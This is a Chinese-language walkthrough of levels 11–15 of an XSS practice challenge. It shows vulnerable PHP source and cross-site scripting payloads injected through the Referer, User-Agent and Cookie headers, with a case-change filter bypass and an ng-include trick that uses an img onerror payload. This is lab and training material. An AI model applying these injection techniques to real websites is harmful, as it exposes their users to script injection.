level 11

老规矩，先查看源码，做代码审计：

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

发现他对关键词、特殊符号都做了过滤，还$str11接收了一个HTTP头部的referer字段，并且输出时没有做处理，用双引号闭合，于是可以对referer进行注入，用bp抓包，然后修改referer字段：

"type="text" οnmouseover="alert(/xss/)

如图：

修改成功后发包，但是没有事件发生，查看源码后发现小写o被转义：

重新抓包，将小写o改成大写O，当移动鼠标的事件发生时出现弹窗，通关：

level 12

查看源代码，做代码审计：

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level12.png></center>
<?php 

发现这关和第十一关类似，也需要抓包，不过将HTTP头部的字段换成了user-agent。

抓包后修改user-agent字段，将o改成大写：

"type="text" Onmouseover="alert(/xss/)

如图：

放包后通关成功：

level 13

做代码审计：

<?php 
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

发现这一关需要修改cookie字段，步骤和前两关一样：

抓包，修改：

"type="text" Onmouseover="alert(/xss/)

如图：

放包后通关成功：

level 14

来到第十四关，什么也没有：

查看源码，也是没有东西：

<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>欢迎来到level14</title>
</head>
<body>
<h1 align=center>欢迎来到level14</h1>
<center><iframe name="leftframe" marginwidth=10 marginheight=10 src="http://www.exifviewer.org/" frameborder=no width="80%" scrolling="no" height=80%></iframe></center><center>这关成功后不会自动跳转。成功者<a href=/xsschallenge/level15.php?src=1.gif>点我进level15</a></center>
</body>
</html>

直接到十五关

level 15

第十五关只有一张图片：

查看源代码：

<title>欢迎来到level15</title>
</head>
<h1 align=center>欢迎来到第15关，自己想个办法走出去吧！</h1>
<p align=center><img src=level15.png></p>
<?php 
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>

发现它接收了一个参数src，并发现ng-include，ng-include的作用如下：

ng-include 指令用于包含外部的 HTML 文件。

ng-include可以作为一个属性，或者一个元素使用

这时候我们可以让这个网页包含一个有漏洞的外部php文件，如level1.php，用onerror事件

?src='level1.php?name=<img src=1 οnerrοr=alert(/xss/)>'